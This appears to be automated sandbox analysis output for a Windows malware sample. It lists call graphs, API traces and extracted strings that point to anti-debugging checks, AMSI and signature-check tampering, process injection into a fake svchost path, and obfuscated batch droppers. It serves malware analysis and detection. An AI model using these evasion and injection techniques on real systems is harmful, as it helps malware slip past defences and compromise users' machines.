call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c ExitProcess 3122->3358 3359 28690ae-28690bd call 2844898 3122->3359 3396 2868276-28682ed call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c 3123->3396 3397 28682f2-28683fd call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c 3123->3397 3876 2864535-2864576 call 
2844d8c * 2 call 2844734 call 285df00 3146->3876 3877 286457b-28649c4 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2858704 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2858704 call 2847e10 3146->3877 3147->3146 3359->3358 3377 28690c3-2869396 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 285e974 call 284480c call 284494c call 28446a4 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2847e10 3359->3377 3879 286964e-286984f call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28449a4 call 2858ba8 3377->3879 3880 286939c-2869649 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 
284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2844d8c * 2 call 2844734 call 285df00 3377->3880 3396->3397 3584 2868404-2868724 call 28449a4 call 285e0c4 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 285cf9c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c 3397->3584 3585 28683ff-2868402 3397->3585 3951 286626f-28664c8 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 2844d20 call 2844d8c call 2844734 call 285df00 3580->3951 3952 28664cd-2866bf0 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c 
call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28436a0 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 2842f08 call 2847944 call 2844798 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2842f08 call 2847944 call 2844798 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 28436d0 3580->3952 4211 2868726-2868738 call 285857c 3584->4211 4212 286873d-2868f20 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c ResumeThread call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c CloseHandle call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 
call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2857ecc call 2858798 * 6 CloseHandle call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c 3584->4212 3585->3584 4489 2867c8d-2867ca4 call 28436d0 3850->4489 3851->3850 3876->3877 4675 28649c6-2864a1c call 285e5cc call 2844d8c call 2844734 call 2844d8c call 285df00 3877->4675 4676 2864a21-2864c7a call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2858704 call 284480c call 284494c call 28446a4 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2858704 call 2847e10 3877->4676 3879->3358 3880->3879 3951->3952 4211->4212 4212->3122 4675->4676 4958 2864cd7-28650a7 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2858704 call 284494c call 2858408 Sleep call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 2844d20 call 285de78 call 2844d20 call 285de78 call 284480c call 284494c * 2 MoveFileA call 284480c call 284494c * 2 MoveFileA call 284494c call 2844d20 call 285de78 call 284494c call 2844d20 call 285de78 call 284494c call 2844d20 call 285de78 4676->4958 4959 2864c7c-2864cd2 call 285e5cc call 2844d8c call 2844734 call 2844d8c call 285df00 4676->4959 4958->2013 4959->4958
                        APIs
                        • InetIsOffline.URL(00000000,00000000,0286B3D5,?,?,?,000002F7,00000000,00000000), ref: 0285F0E2
                          • Part of subcall function 0285881C: LoadLibraryA.KERNEL32(00000000,00000000,02858903), ref: 02858850
                          • Part of subcall function 0285881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02858903), ref: 02858860
                          • Part of subcall function 0285881C: GetProcAddress.KERNEL32(75380000,00000000), ref: 02858879
                          • Part of subcall function 0285881C: FreeLibrary.KERNEL32(75380000,00000000,028A2388,Function_000065D8,00000004,028A2398,028A2388,000186A3,00000040,028A239C,75380000,00000000,00000000,00000000,00000000,02858903), ref: 028588E3
                          • Part of subcall function 0285EFC8: GetModuleHandleW.KERNEL32(KernelBase,?,0285F3CC,UacInitialize,028A237C,0286B40C,UacScan,028A237C,0286B40C,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanString), ref: 0285EFCE
                          • Part of subcall function 0285EFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0285EFE0
                          • Part of subcall function 0285F024: GetModuleHandleW.KERNEL32(KernelBase), ref: 0285F034
                          • Part of subcall function 0285F024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0285F046
                          • Part of subcall function 0285F024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0285F05D
                          • Part of subcall function 02847E10: GetFileAttributesA.KERNEL32(00000000,?,0285FD00,ScanString,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanString,028A237C,0286B40C,UacScan,028A237C,0286B40C,UacInitialize), ref: 02847E1B
                          • Part of subcall function 0284C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029968C8,?,02860032,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanBuffer,028A237C,0286B40C,OpenSession), ref: 0284C2FB
                          • Part of subcall function 0285DFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285E0B4), ref: 0285E01F
                          • Part of subcall function 0285DFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0285E0B4), ref: 0285E04F
                          • Part of subcall function 0285DFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0285E064
                          • Part of subcall function 0285DFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0285E090
                          • Part of subcall function 0285DFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0285E099
                          • Part of subcall function 02847E34: GetFileAttributesA.KERNEL32(00000000,?,02862E7D,ScanString,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,Initialize), ref: 02847E3F
                          • Part of subcall function 02847FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,0286301B,OpenSession,028A237C,0286B40C,ScanString,028A237C,0286B40C,Initialize,028A237C,0286B40C,ScanString,028A237C,0286B40C), ref: 02847FD5
                          • Part of subcall function 0285DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285DFD2), ref: 0285DF3F
                          • Part of subcall function 0285DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0285DF79
                          • Part of subcall function 0285DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0285DFA6
                          • Part of subcall function 0285DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0285DFAF
                          • Part of subcall function 02858798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize,028A23A4,0285A774,UacScan), ref: 028587AC
                          • Part of subcall function 02858798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028587C6
                          • Part of subcall function 02858798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028A23A4,0285A3BF,ScanString,028A23A4,0285A774,ScanBuffer,028A23A4,0285A774,Initialize), ref: 02858802
                          • Part of subcall function 02858704: LoadLibraryW.KERNEL32(amsi), ref: 0285870D
                          • Part of subcall function 02858704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0285876C
                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,0286B764), ref: 02864DEB
                          • Part of subcall function 0285DE78: RtlInitUnicodeString.NTDLL(?,?), ref: 0285DEA0
                          • Part of subcall function 0285DE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285DEF2), ref: 0285DEB6
                          • Part of subcall function 0285DE78: NtDeleteFile.NTDLL(?), ref: 0285DED5
                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02864FEB
                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02865041
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                        • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                        • API String ID: 2010126900-181751239
                        • Opcode ID: 46e6e36125bed36d5bfc3493105d554f9cb2349c49ff9794fa1a4688b9743f3e
                        • Instruction ID: 17a00392180701df365a5198dd7cd3a8359059971610c2b2b9debc96f2697bc7
                        • Opcode Fuzzy Hash: 46e6e36125bed36d5bfc3493105d554f9cb2349c49ff9794fa1a4688b9743f3e
                        • Instruction Fuzzy Hash: C3240B3DA1011C8BEB10EB68DD81BEE73B6FF95304F1081A1E409E7655DE74AE868F16

                        Control-flow Graph

                        control_flow_graph 5547 2845a78-2845ab9 GetModuleFileNameA RegOpenKeyExA 5548 2845afb-2845b3e call 28458b4 RegQueryValueExA 5547->5548 5549 2845abb-2845ad7 RegOpenKeyExA 5547->5549 5556 2845b40-2845b5c RegQueryValueExA 5548->5556 5557 2845b62-2845b7c RegCloseKey 5548->5557 5549->5548 5550 2845ad9-2845af5 RegOpenKeyExA 5549->5550 5550->5548 5552 2845b84-2845bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 5550->5552 5554 2845c9e-2845ca5 5552->5554 5555 2845bbb-2845bbf 5552->5555 5560 2845bc1-2845bc5 5555->5560 5561 2845bcb-2845be1 lstrlenA 5555->5561 5556->5557 5558 2845b5e 5556->5558 5558->5557 5560->5554 5560->5561 5562 2845be4-2845be7 5561->5562 5563 2845bf3-2845bfb 5562->5563 5564 2845be9-2845bf1 5562->5564 5563->5554 5566 2845c01-2845c06 5563->5566 5564->5563 5565 2845be3 5564->5565 5565->5562 5567 2845c30-2845c32 5566->5567 5568 2845c08-2845c2e lstrcpynA LoadLibraryExA 5566->5568 5567->5554 5569 2845c34-2845c38 5567->5569 5568->5567 5569->5554 5570 2845c3a-2845c6a lstrcpynA LoadLibraryExA 5569->5570 5570->5554 5571 2845c6c-2845c9c lstrcpynA LoadLibraryExA 5570->5571 5571->5554
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02840000,0286E790), ref: 02845A94
                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02840000,0286E790), ref: 02845AB2
                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02840000,0286E790), ref: 02845AD0
                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02845AEE
                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02845B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02845B37
                        • RegQueryValueExA.ADVAPI32(?,02845CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02845B7D,?,80000001), ref: 02845B55
                        • RegCloseKey.ADVAPI32(?,02845B84,00000000,?,?,00000000,02845B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02845B77
                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02845B94
                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02845BA1
                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02845BA7
                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02845BD2
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02845C19
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02845C29
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02845C51
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02845C61
                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02845C87
                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02845C97
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                        • API String ID: 1759228003-2375825460
                        • Opcode ID: 8c30737a48ad2055d61732a3069e4d20a9ce3e1052864a4a611988a72c7e285a
                        • Instruction ID: 0c978e5b48fcefc32cf67085fb93bf9fee7babf092adc09857e1d6e228243065
                        • Opcode Fuzzy Hash: 8c30737a48ad2055d61732a3069e4d20a9ce3e1052864a4a611988a72c7e285a
                        • Instruction Fuzzy Hash: 6B51697DA4025C7FFB21D6A8CC46FEF77AD9B14744F8001A1AA08E6181DF789B848F65

                        Control-flow Graph

                        control_flow_graph 5647 285f024-285f03e GetModuleHandleW 5648 285f040-285f052 GetProcAddress 5647->5648 5649 285f06a-285f072 5647->5649 5648->5649 5650 285f054-285f064 CheckRemoteDebuggerPresent 5648->5650 5650->5649 5651 285f066 5650->5651 5651->5649
                        APIs
                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 0285F034
                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0285F046
                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0285F05D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                        • API String ID: 35162468-539270669
                        • Opcode ID: 2d3ad8ec9abc7c49cc928f812b2f0db416b462aeb66c6c72c203965bbb715ba9
                        • Instruction ID: ba3e1869173f1b0a2532a6a2a63ef3b7ca9384fc7f5e3e7c82748dfb028f46c1
                        • Opcode Fuzzy Hash: 2d3ad8ec9abc7c49cc928f812b2f0db416b462aeb66c6c72c203965bbb715ba9
                        • Instruction Fuzzy Hash: 77F0A73C90427CABDB10B6A888887DDFBB95F27328F6843D4A929E25C2E7750684C651

                        Control-flow Graph

                        APIs
                          • Part of subcall function 02844ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02844EDA
                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0285E0B4), ref: 0285E01F
                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0285E0B4), ref: 0285E04F
                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0285E064
                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0285E090
                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0285E099
                          • Part of subcall function 02844C0C: SysFreeString.OLEAUT32(0285ED84), ref: 02844C1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                        • String ID:
                        • API String ID: 1897104825-0
                        • Opcode ID: 5fe3bcf56b942f52949e16dd30a063aef5fc8647b0fcc6aba638654b302acbbc
                        • Instruction ID: a480ef04f48a40100bd4336c9c5f14f6b7b3f7740284530bbd28582e1cc22b1a
                        • Opcode Fuzzy Hash: 5fe3bcf56b942f52949e16dd30a063aef5fc8647b0fcc6aba638654b302acbbc
                        • Instruction Fuzzy Hash: 7B21A47D65031C7BEB51EAD8CC46FDE77BDAB48704F500461B600F71C0DAB4AA458B56

                        Control-flow Graph

                        APIs
                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0285E86A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: CheckConnectionInternet
                        • String ID: Initialize$OpenSession$ScanBuffer
                        • API String ID: 3847983778-3852638603
                        • Opcode ID: e0d07639a46e87bfb4ddf8e88c40c815d609e2aac49c53e4ab7481b0ce3da32b
                        • Instruction ID: 20f7e16ad3d95b4e5a7f46876ffea80b5cd91223e566a772a571f158acb71ffa
                        • Opcode Fuzzy Hash: e0d07639a46e87bfb4ddf8e88c40c815d609e2aac49c53e4ab7481b0ce3da32b
                        • Instruction Fuzzy Hash: 8C41FF3DA1021C9BEB10EBA8DC81B9E77FAEF49710F214425E841E7655DE78AE058F11

                        Control-flow Graph

                        APIs
                          • Part of subcall function 02858018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02858088,?,?,00000000,?,028579FE,ntdll,00000000,00000000,02857A43,?,?,00000000), ref: 02858056
                          • Part of subcall function 02858018: GetModuleHandleA.KERNELBASE(?), ref: 0285806A
                          • Part of subcall function 028580C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02858148,?,?,00000000,00000000,?,02858061,00000000,KernelBASE,00000000,00000000,02858088), ref: 0285810D
